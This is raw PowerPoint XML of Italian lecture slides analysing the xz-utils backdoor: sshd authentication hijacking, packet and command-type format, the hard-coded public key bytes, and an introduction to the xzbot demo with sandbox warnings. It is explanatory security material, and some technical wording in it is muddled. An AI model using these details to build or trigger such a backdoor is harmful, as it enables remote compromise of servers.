            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, viene confrontata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>con una chiave pubblica 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iniettata durante l'installazione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pub,Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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62044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81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1242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Analisi dell'autenticazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L'autenticazione "delegata" alla backdoor è il motivo per cui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> era 1,7 volte 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più lento!</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRP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Filippo Valsorda, crittografo open-source, parla di un attacco  RCE, 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gated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e non-bypass:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RCE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: passata l'autenticazione, il payload del pacchetto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>viene eseguito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con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>system;</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>gated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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>solo il proprietario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del certificato di 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K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pub,Jia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 può eseguire la backdoor;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>non-bypass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: non c'è un escamotage per "girare attorno" all'autenticazione che, anzi, è parte del piano. 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Jia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Tan è formalmente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>autorizzato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 dal sistema ad entrare nel S.O. in remoto.</a:t>
            </a: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95255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82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462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Caratteristiche del pacchetto</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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Il 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payload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 dev'essere un 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</a:rPr>
              <a:t>chypertext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 con Enc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>chacha20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(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</a:rPr>
              <a:t>Sign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Kpriv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(M),M):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M firmato con chiave a crittografia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RSA con protocollo ED448, un protocollo di tipo ECC;</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pP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K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25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la conosce solo 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Jia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Tan;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pP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K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pub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è sul sistema;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Firma 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Sign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Kpriv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(M) concatenata a M costituiscono il payload e vengono criptati con chacha20, un counter stream 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cypher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con chiave 256-bit, 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nounce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e counter 64-bit;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E60A1D-1B57-50D9-2F6A-8537D53EDD57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383412" y="2691114"/>
            <a:ext cx="11237088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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|   a (32 bit)  |   b (32 bit)  |           c (64 bit)          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
+                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ciphertext (240 bytes)                    +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+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7157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83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Verifica del pacchetto</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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Prima di autenticare, la backdoor verifica il tipo di pacchetto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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> facendo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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a*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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b+c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: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Se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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a*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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b+c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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&gt;3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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, allora la backdoor non processa il pacchetto e prosegue;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latin typeface="Trade Gothic Next Light"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Altrimenti:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT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a*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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b+c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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== 1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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: un tipo di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> senza payload;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT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a*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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b+c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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== 2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: un tipo di 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request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con payload eseguibile, terminato con "\0";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT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a*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="24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b+c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2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== 3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: un tipo di pacchetto con 48 Byte firmati.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E60A1D-1B57-50D9-2F6A-8537D53EDD57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383412" y="2691114"/>
            <a:ext cx="11237088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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|   a (32 bit)  |   b (32 bit)  |           c (64 bit)          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
+                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ciphertext (240 bytes)                    +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+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8691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84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Crittoanalisi di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>amlweems</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" err="1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Alias GitHub di Antony </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Weems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, un ricercatore Google.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La chiave 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K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" baseline="-250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è stata recuperata dal codice sorgente della backdoor (era hard-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coded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);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E' stato impostato un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>honeypot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> per intercettare eventuali messaggi da remoto;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Si è notato che i primi 32 Byte di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sono utilizzabili nel cifrario chacha20 come chiave crittografica. Con un attacco di tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chosen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>plain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-text sarebbe possibile decifrare qualsiasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chypertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> che verrebbe inviato da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1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it-IT" sz="2800" b="1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E60A1D-1B57-50D9-2F6A-8537D53EDD57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250062" y="5091414"/>
            <a:ext cx="1123708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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    signature (114 bytes)                      |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| x (1 bit) |            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>unused</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ? (14 bit)          | y (1 bit) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>unknown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> (8 bit)        |         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> (8 bit)        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>unknown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> (8 bit)        |         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> \x00          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+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26406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85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Crittoanalisi di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>amlweems</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" err="1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Chiave pubblica di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0a 31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 3b 2f 1f c6 92 92 68 32 52 c8 c1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 28
34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48
10 0c b0 6c 3a be 14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 89 55 d2 45 00 c7 7f 6e
20 d3 2c 60 2b 2c 6d 31 00</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800"/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53395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86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53860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xzbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> demo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Demo del progetto GitHub di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>amlweems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> per dimostrare il funzionamento della backdoor.</a:t>
            </a:r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Prima di eseguire questa demo occorre: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Scaricare la libreria </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>liblzma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vulnerabile (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amlweems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usa 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xz-utils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/5.6.1-1);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Essere quindi consci di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rischiare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una call-home verso il C2 remoto reale di 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Jia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Tan:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o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"C2" abbrevia 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Command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-To-Control: è un server bot per orchestrare l'attacco;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o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segnale call-home stabilisce una connessione "reverse", dalla network al C2 server;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Effettuare il setup opportuno di un ambiente di sandbox che isoli il sistema "cavia".</a:t>
            </a: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Come dimostrazione, </a:t>
            </a:r>
            <a:r>
